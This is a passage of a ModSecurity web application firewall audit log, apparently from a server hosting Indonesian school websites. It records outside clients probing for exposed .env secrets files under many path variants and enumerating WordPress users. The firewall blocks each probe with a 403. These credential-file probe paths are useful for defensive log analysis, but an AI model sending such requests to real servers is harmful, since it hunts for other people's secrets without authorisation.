%s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941975997401 902 (- - -) Stopwatch2: 1749941975997401 902; combined=297, p1=263, p2=0, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb0b1113-Z-- --ea98e271-A-- [15/Jun/2025:05:59:36 +0700] aE3-2D2YoubFl106kA3SrwAAAI8 103.236.140.4 55388 103.236.140.4 8181 --ea98e271-B-- GET /.env.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G930F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36 --ea98e271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea98e271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941976444465 694 (- - -) Stopwatch2: 1749941976444465 694; combined=312, p1=279, p2=0, p3=0, p4=0, p5=33, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea98e271-Z-- --8af28213-A-- [15/Jun/2025:05:59:36 +0700] aE3-2IZIfYpKBvn-jB7HDgAAAEU 103.236.140.4 55390 103.236.140.4 8181 --8af28213-B-- GET /.env.k8s HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 --8af28213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af28213-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941976888383 878 (- - -) Stopwatch2: 1749941976888383 878; combined=294, p1=261, p2=0, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af28213-Z-- --1191c974-A-- [15/Jun/2025:05:59:37 +0700] aE3-2br7GPil_2h-MzYG6gAAAM8 103.236.140.4 55392 103.236.140.4 8181 --1191c974-B-- GET /.env.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/WK10171 Safari/8536.25 --1191c974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1191c974-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941977331873 697 (- - -) Stopwatch2: 1749941977331873 697; combined=297, p1=264, p2=0, p3=0, p4=0, p5=32, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1191c974-Z-- --de214f52-A-- [15/Jun/2025:05:59:37 +0700] aE3-2fGguMGNwgSGIMwhsgAAAA8 103.236.140.4 55394 103.236.140.4 8181 --de214f52-B-- GET /.env-csr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 --de214f52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de214f52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941977774797 810 (- - -) Stopwatch2: 1749941977774797 810; combined=288, p1=256, p2=0, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de214f52-Z-- --6634de00-A-- [15/Jun/2025:05:59:38 +0700] aE3-2vGguMGNwgSGIMwhswAAABE 103.236.140.4 55396 103.236.140.4 8181 --6634de00-B-- GET /.env.swo HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4 --6634de00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6634de00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941978240377 804 (- - -) Stopwatch2: 1749941978240377 804; combined=281, p1=250, p2=0, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6634de00-Z-- --8af28213-A-- [15/Jun/2025:05:59:38 +0700] aE3-2vGguMGNwgSGIMwhtAAAABI 103.236.140.4 55398 103.236.140.4 8181 --8af28213-B-- GET /.env.swn HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --8af28213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af28213-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941978685813 810 (- - -) Stopwatch2: 1749941978685813 810; combined=285, p1=253, p2=0, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af28213-Z-- --b84cdf64-A-- [15/Jun/2025:05:59:39 +0700] aE3-2z2YoubFl106kA3SsAAAAJE 103.236.140.4 55400 103.236.140.4 8181 --b84cdf64-B-- GET /.env-rce HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux 2.4.18-18.7.x i686; U) Opera 6.03 [en] --b84cdf64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84cdf64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941979130545 756 (- - -) Stopwatch2: 1749941979130545 756; combined=302, p1=264, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84cdf64-Z-- --a76d8440-A-- [15/Jun/2025:05:59:39 +0700] aE3-24ZIfYpKBvn-jB7HDwAAAEc 103.236.140.4 55402 103.236.140.4 8181 --a76d8440-B-- GET /.env.sql HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/9.80 (Windows NT 6.1; WOW64; MRA 6.4 (build 8614)) Presto/2.12.388 Version/12.16 --a76d8440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a76d8440-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941979571050 1005 (- - -) Stopwatch2: 1749941979571050 1005; combined=390, p1=350, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a76d8440-Z-- --7097725c-A-- [15/Jun/2025:06:32:30 +0700] aE4GjvGguMGNwgSGIMwhuQAAAAI 103.236.140.4 55502 103.236.140.4 8181 --7097725c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.61.64.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.61.64.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7097725c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7097725c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749943950005516 2629 (- - -) Stopwatch2: 1749943950005516 2629; combined=1162, p1=377, p2=759, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7097725c-Z-- --6b423a18-A-- [15/Jun/2025:07:12:00 +0700] aE4P0Lr7GPil_2h-MzYIEAAAAM8 103.236.140.4 33618 103.236.140.4 8181 --6b423a18-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413635 --6b423a18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b423a18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946320338888 610 (- - -) Stopwatch2: 1749946320338888 610; combined=205, p1=182, p2=0, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b423a18-Z-- --1281d63a-A-- [15/Jun/2025:07:12:00 +0700] aE4P0D2YoubFl106kA3T0gAAAIs 103.236.140.4 33626 103.236.140.4 8181 --1281d63a-B-- GET /.env.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180494943 --1281d63a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1281d63a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946320667258 842 (- - -) Stopwatch2: 1749946320667258 842; combined=344, p1=306, p2=0, p3=0, p4=0, p5=38, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1281d63a-Z-- --398cf477-A-- [15/Jun/2025:07:12:00 +0700] aE4P0Lr7GPil_2h-MzYIEQAAANM 103.236.140.4 33630 103.236.140.4 8181 --398cf477-B-- GET /.env.example HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413638 --398cf477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --398cf477-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946320850614 672 (- - -) Stopwatch2: 1749946320850614 672; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --398cf477-Z-- --f6cfa652-A-- [15/Jun/2025:07:12:01 +0700] aE4P0br7GPil_2h-MzYIEgAAANE 103.236.140.4 33634 103.236.140.4 8181 --f6cfa652-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180494946 --f6cfa652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f6cfa652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946321073242 681 (- - -) Stopwatch2: 1749946321073242 681; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6cfa652-Z-- --c136102c-A-- [15/Jun/2025:07:12:01 +0700] aE4P0fGguMGNwgSGIMwjIQAAAAo 103.236.140.4 33638 103.236.140.4 8181 --c136102c-B-- GET /.env.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413641 --c136102c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c136102c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946321282042 696 (- - -) Stopwatch2: 1749946321282042 696; combined=279, p1=245, p2=0, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c136102c-Z-- --57ac8e0c-A-- [15/Jun/2025:07:12:01 +0700] aE4P0YZIfYpKBvn-jB7J6AAAAFc 103.236.140.4 33642 103.236.140.4 8181 --57ac8e0c-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180494949 --57ac8e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --57ac8e0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946321453107 759 (- - -) Stopwatch2: 1749946321453107 759; combined=335, p1=301, p2=0, p3=0, p4=0, p5=34, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ac8e0c-Z-- --4626f437-A-- [15/Jun/2025:07:12:02 +0700] aE4P0vGguMGNwgSGIMwjJAAAABI 103.236.140.4 33646 103.236.140.4 8181 --4626f437-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413647 --4626f437-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4626f437-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946322013846 739 (- - -) Stopwatch2: 1749946322013846 739; combined=269, p1=246, p2=0, p3=0, p4=0, p5=23, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4626f437-Z-- --47c03d35-A-- [15/Jun/2025:07:12:03 +0700] aE4P0_GguMGNwgSGIMwjLgAAAAM 103.236.140.4 33654 103.236.140.4 8181 --47c03d35-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.144 Accept-Encoding: gzip X-Varnish: 180413662 --47c03d35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --47c03d35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749946323864269 790 (- - -) Stopwatch2: 1749946323864269 790; combined=333, p1=300, p2=0, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47c03d35-Z-- --b446d409-A-- [15/Jun/2025:07:24:45 +0700] aE4SzYZIfYpKBvn-jB7J7AAAAEQ 103.236.140.4 33698 103.236.140.4 8181 --b446d409-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.85.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.85.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b446d409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b446d409-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749947085920310 3409 (- - -) Stopwatch2: 1749947085920310 3409; combined=1444, p1=487, p2=925, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b446d409-Z-- --8139e853-A-- [15/Jun/2025:07:37:28 +0700] aE4VyPGguMGNwgSGIMwjNQAAAA4 103.236.140.4 33734 103.236.140.4 8181 --8139e853-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --8139e853-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8139e853-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] 